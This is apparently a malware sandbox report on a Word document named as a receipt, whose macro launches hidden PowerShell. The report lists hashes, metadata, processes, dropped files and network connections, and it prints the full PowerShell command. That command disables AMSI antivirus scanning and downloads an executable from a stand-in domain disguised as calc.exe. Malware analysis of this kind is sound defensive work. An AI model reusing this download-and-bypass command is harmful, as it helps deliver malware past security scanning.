analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Your_Receipt_1146.doc

Full analysis: https://app.any.run/tasks/3e65e6a3-f9f3-4791-961e-43866f027c70
Verdict: Malicious activity
Analysis date: March 30, 2020, 20:16:27
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Harold, Template: Normal.dotm, Last Saved By: Harold Harepus, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Mar 24 23:49:00 2020, Last Saved Time/Date: Tue Mar 24 23:49:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
MD5:

28BAB9F6E7079EE4E520E4B65397022F

SHA1:

BE336692D15BCBC4BC8D1FEC5CA3F2F61E1AF823

SHA256:

FA55FFCFA142A3A999F3913A9EDD948EA7ED8464DDC12EB748E79DB614929E4E

SSDEEP:

3072:MBdIuBkiY2v7cIi/OtMMkCk3SSXF/0M7KB3wy5edEA/oiDPzOc1nVQ2au:UfWiBcDCPyR0M+CSedEA/oi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 5372)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 5372)
  • SUSPICIOUS

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 4332)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 5372)
    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 5372)
    • Reads Environment values

      • WINWORD.EXE (PID: 5372)
    • Scans artifacts that could help determine the target

      • WINWORD.EXE (PID: 5372)
    • Reads the software policy settings

      • powershell.exe (PID: 4332)
    • Reads settings of System Certificates

      • powershell.exe (PID: 4332)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 5372)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Harold
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: Harold Harepus
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:03:24 23:49:00
ModifyDate: 2020:03:24 23:49:00
Pages: 1
Words: -
Characters: 3
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Bytes: 143020
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 3
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
90
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe no specs conhost.exe

Process information

PID
CMD
Path
Indicators
Parent process
5372"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\Your_Receipt_1146.doc" /o ""C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
16.0.12026.20264
4332powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); If (test-path $env:APPDATA + '\C:\Windows\System32\calc.exe') {Remove-Item $env:APPDATA + '\C:\Windows\System32\calc.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'EGG{adfcfdb9ef305f26ab51303294da6afc }'; $OEKQD.DownloadFile('https://even_more_shady.looking.domain.lab/to/get/some/malware.exe', $env:APPDATA + '\C:\Windows\System32\calc.exe'); Stop-Process -Id $Pid -ForceC:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.16299.15 (WinBuild.160101.0800)
5516\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Total events
2 507
Read events
2 210
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
11
Unknown types
5

Dropped files

PID
Process
Filename
Type
5372WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z4G5H3E228JCPHD7DCVE.temp
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\00SD1B3NHG4V2E0GSYD6.temp
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC0BFB3992C658739.TMP
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3A08CB9E-59E2-4D5A-A097-30F67D5C2E6C}.tmp
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3F88E98A-51C1-40E9-87A0-29785A3FAABE}.tmp
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shm
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal
MD5:
SHA256:
5372WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{53403A1B-DF2A-45A3-816A-92EC18E8FC0A}.tmp
MD5:
SHA256:
4332powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lhhywp4w.vtk.ps1text
MD5:A99C0FDF62E2F3277A6AFC9CD8078CAB
SHA256:CDC0E4138935FD12754F6626984A1CEA6E1E3FAD98A85D8C7D450209E0D78307
5372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\.sestext
MD5:77468879D23F78437CE2EE4A90BA87EE
SHA256:A92EA4ACC88632680BF533A1300DB780AA6BAA523D8B343C71C0B47D118889F1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5372
WINWORD.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
5372
WINWORD.EXE
52.114.77.33:443
self.events.data.microsoft.com
Microsoft Corporation
IE
suspicious
756
svchost.exe
20.191.48.196:443
settings-win-ppe.data.microsoft.com
Microsoft Corporation
US
unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
whitelisted
self.events.data.microsoft.com
  • 52.114.77.33
  • 52.114.128.70
whitelisted
settings-win-ppe.data.microsoft.com
  • 20.191.48.196
whitelisted

Threats

No threats detected
No debug info